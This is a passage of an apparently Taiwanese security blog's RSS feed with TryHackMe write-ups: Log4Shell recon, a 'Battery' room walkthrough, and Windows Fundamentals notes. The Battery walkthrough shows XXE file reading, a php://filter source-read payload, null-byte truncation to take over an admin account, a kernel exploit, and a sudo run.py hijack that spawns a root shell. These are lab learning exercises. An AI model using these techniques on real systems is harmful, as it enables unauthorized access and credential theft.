<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Try Hack Me on Steven Meow's Blog 🐱</title><link>http://blog.stevenyu.tw/categories/try-hack-me/</link><description>Recent content in Try Hack Me on Steven Meow's Blog 🐱</description><generator>Hugo -- 0.157.0</generator><language>zh-TW</language><lastBuildDate>Sun, 19 Dec 2021 13:03:00 +0800</lastBuildDate><atom:link href="http://blog.stevenyu.tw/categories/try-hack-me/index.xml" rel="self" type="application/rss+xml"/><item><title>Solar, exploiting log4j (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/12/19/solar-exploiting-log4j-try-hack-me-writeup/</link><pubDate>Sun, 19 Dec 2021 13:03:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/12/19/solar-exploiting-log4j-try-hack-me-writeup/</guid><description>&lt;p&gt;&lt;a href="https://tryhackme.com/room/solar"&gt;https://tryhackme.com/room/solar&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;2021 / 12 / 9 公開了 CVE-2021-44228，影響到了 log4j，它的危害程度達到 10，這個漏洞又被稱作 Log4Shell&lt;/li&gt;
&lt;li&gt;現在已經有新版的 2.16.0 Release 了，不過又出現了 Log4j2&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="recon"&gt;Recon&lt;/h2&gt;
&lt;p&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/40d26-3mP4uA7.png"&gt;&lt;/p&gt;
&lt;p&gt;透過掃 Port 可以看到有開 3 個 Port，分別是22,111,8983&lt;/p&gt;
&lt;p&gt;&lt;code&gt;rustscan -a 10.10.18.186 -r 1-65535&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;可以用 nmap 做更詳細的掃瞄&lt;/p&gt;
&lt;p&gt;nmap -sV -Pn -A -p22,111,8983 10.10.18.186&lt;/p&gt;
&lt;p&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/65b39-0SSpNAR.png"&gt;&lt;/p&gt;
&lt;p&gt;可以發現 8983 開的是一個 Apache solr 的 Server&lt;/p&gt;
&lt;h2 id="discovery"&gt;Discovery&lt;/h2&gt;
&lt;p&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/2b2d7-RidZWlU.png"&gt;&lt;/p&gt;
&lt;p&gt;觀察首頁的版本可以知道他是 Solr 8.11.0&lt;/p&gt;
&lt;p&gt;觀察 &lt;code&gt;-Dsolr.log.dir&lt;/code&gt; 可以看到他的 log Path 是 &lt;code&gt;/var/solr/logs&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/51479-KE5WrQb.png"&gt;&lt;/p&gt;
&lt;p&gt;下載 lab 提供的 solrlogs.zip 檔案，他是一份範例的 Log 檔案&lt;/p&gt;
&lt;p&gt;可以觀察到裡面有一個叫做 &lt;code&gt;solr.log&lt;/code&gt; 的檔案會紀錄網頁的 Path 相關 Log&lt;/p&gt;</description></item><item><title>Battery (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/09/02/battery-try-hack-me-writeup/</link><pubDate>Thu, 02 Sep 2021 23:51:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/09/02/battery-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL :　https://tryhackme.com/room/battery&lt;/p&gt;
&lt;p&gt;IP : 10.10.207.162&lt;/p&gt;
&lt;h2 id="recon"&gt;Recon&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;掃 Port&lt;code&gt;rustscan -a 10.10.207.162 -r 1-65535&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/cc8f0-YI7brFj.png"&gt;&lt;/li&gt;
&lt;li&gt;發現有開22&lt;/li&gt;
&lt;li&gt;80&lt;code&gt;nmap -A -p22,80 10.10.207.162&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/5cb29-fpTOJSl.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="web"&gt;Web&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;觀察首頁&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b8e98-kzK5QSI.png"&gt;掃路徑- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9c9e8-zW9T06O.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;/forms&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/aab41-0BtjlCh.png"&gt;&lt;code&gt;/admin.php&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/68a4e-Yt1XqNk.png"&gt;發現 &lt;code&gt;/forms&lt;/code&gt; 把 Header 拔掉就不會自動跳轉- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d39ae-dBIg21Q.png"&gt;&lt;/li&gt;
&lt;li&gt;裡面傳送的資料是 XML ，可能可以 XXE&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c3701-MnxLcgL.png"&gt;但沒有登入都失敗&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-java" data-lang="java"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;function &lt;span style="color:#50fa7b"&gt;XMLFunction&lt;/span&gt;(){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8be9fd;font-style:italic"&gt;var&lt;/span&gt; xml &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; &amp;#39;&amp;#39; &lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;#39;&amp;#39; &lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;#39;&amp;#39; &lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;#39;&amp;#39; &lt;span style="color:#ff79c6"&gt;+&lt;/span&gt; $(&amp;#39;#name&amp;#39;).&lt;span style="color:#50fa7b"&gt;val&lt;/span&gt;() &lt;span style="color:#ff79c6"&gt;+&lt;/span&gt; &amp;#39;&amp;#39; &lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;#39;&amp;#39; &lt;span style="color:#ff79c6"&gt;+&lt;/span&gt; $(&amp;#39;#search&amp;#39;).&lt;span style="color:#50fa7b"&gt;val&lt;/span&gt;() &lt;span style="color:#ff79c6"&gt;+&lt;/span&gt; &amp;#39;&amp;#39; &lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &amp;#39;&amp;#39;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8be9fd;font-style:italic"&gt;var&lt;/span&gt; xmlhttp &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;new&lt;/span&gt; XMLHttpRequest();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xmlhttp.&lt;span style="color:#50fa7b"&gt;onreadystatechange&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; function () {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;if&lt;/span&gt;(xmlhttp.&lt;span style="color:#50fa7b"&gt;readyState&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;==&lt;/span&gt; 4){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; console.&lt;span style="color:#50fa7b"&gt;log&lt;/span&gt;(xmlhttp.&lt;span style="color:#50fa7b"&gt;readyState&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; console.&lt;span style="color:#50fa7b"&gt;log&lt;/span&gt;(xmlhttp.&lt;span style="color:#50fa7b"&gt;responseText&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; document.&lt;span style="color:#50fa7b"&gt;getElementById&lt;/span&gt;(&amp;#39;errorMessage&amp;#39;).&lt;span style="color:#50fa7b"&gt;innerHTML&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; xmlhttp.&lt;span style="color:#50fa7b"&gt;responseText&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xmlhttp.&lt;span style="color:#50fa7b"&gt;open&lt;/span&gt;(&lt;span style="color:#f1fa8c"&gt;&amp;#34;POST&amp;#34;&lt;/span&gt;,&lt;span style="color:#f1fa8c"&gt;&amp;#34;forms.php&amp;#34;&lt;/span&gt;,&lt;span style="color:#ff79c6"&gt;true&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xmlhttp.&lt;span style="color:#50fa7b"&gt;send&lt;/span&gt;(xml);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;};
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;在 &lt;code&gt;register.php&lt;/code&gt; 註冊一組帳密&lt;code&gt;meow&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ABC&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;meow&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4f717-z1niZ8X.png"&gt;&lt;/li&gt;
&lt;li&gt;註冊成功&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b18ad-hqNbHMh.png"&gt;嘗試登入- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c3efc-Lo6rA6Z.png"&gt;&lt;/li&gt;
&lt;li&gt;使用介面上的功能&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/a4018-o5zsYOs.png"&gt;&lt;/li&gt;
&lt;li&gt;發現不能使用再註冊一組- &lt;code&gt;meow1&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;DEF&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;meow1&lt;/code&gt;掃目錄- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/8b15b-4zXmQmN.png"&gt;&lt;/li&gt;
&lt;li&gt;發現一個 &lt;code&gt;/report&lt;/code&gt;載下來發現是一個 ELF- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/54614-tQ07xT1.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="reverse"&gt;Reverse&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;選單&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/5e4c4-0fPOAwu.png"&gt;使用者- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/24d95-45VYQ51.png"&gt;字串比較- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/1f1ca-e5GzGAk.png"&gt;更新- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/99078-LWMnjwK.png"&gt;&lt;/li&gt;
&lt;li&gt;這邊看到 &lt;code&gt;admin@bank.a&lt;/code&gt; 滿可疑的&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="web-1"&gt;Web&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;嘗試註冊 &lt;code&gt;admin@bank.a&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/dc8f7-ETydBcl.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9e857-z3FWmBy.png"&gt;被嘲諷ㄌQQ&lt;/li&gt;
&lt;li&gt;但這代表應該確實跟這個有關!!用 Burp 後面加上 &lt;code&gt;%00&lt;/code&gt; 截斷- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/bef3d-Rz7ZLOk.png"&gt;註冊成功- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b70be-xpZQPEi.png"&gt;後台亂輸入都會噴錯- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/3471e-1PJTJn7.png"&gt;重新試著 XXE- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6937d-jmnfWHX.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-gdscript3" data-lang="gdscript3"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;function XMLFunction(){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;var&lt;/span&gt; xml &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;&amp;#39;&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;\n&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;&amp;#39;&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39; ]&amp;gt;&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;\n&lt;/span&gt;&lt;span style="color:#f1fa8c"&gt;&amp;#39;&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;&amp;#39;&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;&amp;#39;&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;+&lt;/span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#34;0&amp;#34;&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;+&lt;/span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;&amp;#39;&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;&amp;#39;&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;+&lt;/span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#34;&amp;amp;b;&amp;#34;&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;+&lt;/span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;&amp;#39;&lt;/span&gt; &lt;span style="color:#ff79c6"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f1fa8c"&gt;&amp;#39;&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;var&lt;/span&gt; xmlhttp &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; new XMLHttpRequest();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xmlhttp&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;onreadystatechange &lt;span style="color:#ff79c6"&gt;=&lt;/span&gt; function () {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff79c6"&gt;if&lt;/span&gt;(xmlhttp&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;readyState &lt;span style="color:#ff79c6"&gt;==&lt;/span&gt; &lt;span style="color:#bd93f9"&gt;4&lt;/span&gt;){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; console&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;log(xmlhttp&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;readyState);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; console&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;log(xmlhttp&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;responseText);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xmlhttp&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;open(&lt;span style="color:#f1fa8c"&gt;&amp;#34;POST&amp;#34;&lt;/span&gt;,&lt;span style="color:#f1fa8c"&gt;&amp;#34;forms.php&amp;#34;&lt;/span&gt;,&lt;span style="font-style:italic"&gt;true&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; xmlhttp&lt;span style="color:#ff79c6"&gt;.&lt;/span&gt;send(xml);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;};
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;XMLFunction();
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;可以讀檔&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/dd64e-Wfam6PO.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;cyber:x:1000:1000:cyber,,,:/home/cyber:/bin/bash
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mysql:x:107:113:MySQL Server,,,:/nonexistent:/bin/false
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;yash:x:1002:1002:,,,:/home/yash:/bin/bash
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;看起來有興趣的使用者&lt;code&gt;cyber&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;yash&lt;/code&gt;讀取原始碼- &lt;code&gt;php://filter/convert.base64-encode/resource=/var/www/html/acc.php&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/b86ed-EXkrQXL.png"&gt;&lt;/li&gt;
&lt;li&gt;找到註解上的密碼&lt;code&gt;//MY CREDS :- cyber:super#secure&amp;amp;password!&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="ssh"&gt;SSH&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d33d2-WhKKIPs.png"&gt;順利連上取得 Base Flag- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/8effd-3aOe5eP.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="提權"&gt;提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;起手式 &lt;code&gt;sudo -l&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ca4fd-OF32tzf.png"&gt;&lt;/li&gt;
&lt;li&gt;發現可以用 root 執行一個 &lt;code&gt;run.py``run.py&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ee3b7-fJIS0Oe.png"&gt;&lt;/li&gt;
&lt;li&gt;但我們沒有權限讀取他 QQ觀察原始碼- &lt;code&gt;admin.php&lt;/code&gt;找到 mysql 的帳密Dump Mysql- mysqldump -u root -h 127.0.0.1 -p details &amp;gt; a.sql&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/26c6a-6SQ3wdb.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ad245-EotjMMo.png"&gt;&lt;/li&gt;
&lt;li&gt;看到一組密碼&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/9d7e1-amFWjRV.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;I_know_my_password&lt;/code&gt;但好像就沒有什麼進展了 QQ跑 Linpeas- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/e4aa1-W4vdGzF.png"&gt;&lt;/li&gt;
&lt;li&gt;發現 Linux Kernel 好像有點舊，可以用 Exploit&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.exploit-db.com/exploits/37292"&gt;https://www.exploit-db.com/exploits/37292&lt;/a&gt;試著載下來編譯執行- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ad3f8-H9YKMfY.png"&gt;&lt;/li&gt;
&lt;li&gt;就成功 Root ㄌFlag2- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/5ba37-y95l3c8.png"&gt;Root Flag- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/5c482-fAVwuni.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/eae5c-GBtAZjF.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="另外一種提權法"&gt;另外一種提權法&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;剛剛可以用 sudo 執行 &lt;code&gt;run.py&lt;/code&gt;但是沒有權限可以讀取但因為這是我的家目錄，所以我可以改檔名、新增檔案- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/a8531-Q9fWApP.png"&gt;所以自己創一個 &lt;code&gt;run.py&lt;/code&gt;- &lt;code&gt;import os&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;os.system(&amp;quot;/bin/bash&amp;quot;)&lt;/code&gt;再 sudo 它- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/7b0ed-6O92JvY.png"&gt;&lt;/li&gt;
&lt;li&gt;也可以順利提權&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="學到ㄌ"&gt;學到ㄌ&lt;/h2&gt;
&lt;p&gt;%00 截斷&lt;br&gt;
XXE 記得加 ;&lt;/p&gt;</description></item><item><title>Windows Fundamentals 1 (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/08/24/windows-fundamentals-1-try-hack-me-writeup/</link><pubDate>Tue, 24 Aug 2021 13:30:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/08/24/windows-fundamentals-1-try-hack-me-writeup/</guid><description>&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/windowsfundamentals1xbx"&gt;https://tryhackme.com/room/windowsfundamentals1xbx&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="task-1-introduction-to-windows"&gt;Task 1 Introduction to Windows&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;可以用 RDP 之類的方法進入 Windows預設帳號 : &lt;code&gt;administrator&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;預設密碼 : &lt;code&gt;letmein123!&lt;/code&gt;但我直接用 THM 提供的 web RDP 介面- &lt;img loading="lazy" src="https://i.imgur.com/l3kfrD2.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="task-2-windows-editions"&gt;Task 2 Windows Editions&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Home 版本 跟 Pro 的差別可以使用 BitLocker&lt;/li&gt;
&lt;li&gt;可以使用 WIP&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="https://i.imgur.com/j4oLsSC.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.microsoft.com/en-us/windows/compare-windows-10-home-vs-proWhat"&gt;https://www.microsoft.com/en-us/windows/compare-windows-10-home-vs-proWhat&lt;/a&gt; encryption can you enable on Pro that you can&amp;rsquo;t enable in Home?- A: BitLocker&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="task-3-the-desktop-gui"&gt;Task 3 The Desktop (GUI)&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Which selection will hide/disable the Search box?&lt;img loading="lazy" src="https://i.imgur.com/dCK3KO7.png"&gt;&lt;/li&gt;
&lt;li&gt;HiddenWhich selection will hide/disable the Task View button?- &lt;img loading="lazy" src="https://i.imgur.com/f05fvL6.png"&gt;&lt;/li&gt;
&lt;li&gt;Show Task View buttonBesides Clock, Volume, and Network, what other icon is visible in the Notification Area?- &lt;img loading="lazy" src="https://i.imgur.com/HYsPpK2.png"&gt;&lt;/li&gt;
&lt;li&gt;action center&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="task-4-the-file-system"&gt;Task 4 The File System&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;檔案系統FAT16 / FAT32File Allocation Table&lt;/li&gt;
&lt;li&gt;USB 裝置之類ㄉ還是看ㄉ到HPFS- High Performance File SystemNTFS- New Technology File SystemNTFS 優勢- 文件紀錄系統，可以自動修復日誌&lt;/li&gt;
&lt;li&gt;單檔案 &amp;gt;= 4G&lt;/li&gt;
&lt;li&gt;可以針對資料夾跟黨按設定權限&lt;/li&gt;
&lt;li&gt;資料夾跟檔案的壓縮&lt;/li&gt;
&lt;li&gt;加密 (Encryption File System, EFS)&lt;img loading="lazy" src="https://i.imgur.com/K48VenM.png"&gt;NTFS 權限- Read對資料夾 ： 可以觀看，跟顯示資料夾中的檔案與子資料夾&lt;/li&gt;
&lt;li&gt;對檔案：可以觀看或存取檔案的內容Write- 對資料夾 ： 可以在資料夾中增加檔案或子資料夾&lt;/li&gt;
&lt;li&gt;對檔案：可以對檔案進行寫入Read &amp;amp; Execute- 對資料夾 ： 可以觀看，顯示資料夾中的檔案與子資料夾；可以直行檔案，會繼承給檔案以及資料夾&lt;/li&gt;
&lt;li&gt;對檔案：可以觀看、存取檔案的內容，也可以直行黨按List folder contents- 對資料夾：可以觀看，並列出檔案以及子資料夾，以及執行檔案，只能給 資料夾繼承Modify- 對資料夾：可以讀取、寫入檔案以及子資料夾；允許刪除資料夾&lt;/li&gt;
&lt;li&gt;對檔案：可以讀取，寫入檔案；允許刪除檔案Full Control- 對資料夾，允許讀取、寫入、變更以及刪除檔案與子資料夾&lt;/li&gt;
&lt;li&gt;對檔案：允許讀取、寫入、變更予刪除檔案&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="alternate-data-streams-ads"&gt;Alternate Data Streams (ADS)&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;一種 NTFS 的 attribute&lt;/li&gt;
&lt;li&gt;每一個檔案至少都會有一個 Data Stream ($DATA)&lt;/li&gt;
&lt;li&gt;ADS 允許一個檔案包含多個 Data Stream&lt;/li&gt;
&lt;li&gt;Windows Explorer 不會對使用者顯示 ADS，需要透過特定的第三方軟體或是 Powershell&lt;/li&gt;
&lt;li&gt;所以有時候 Malware 會使用 ADS 來隱藏資料&lt;/li&gt;
&lt;li&gt;延伸閱讀 &lt;a href="https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/"&gt;https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/&lt;/a&gt;&lt;/li&gt;
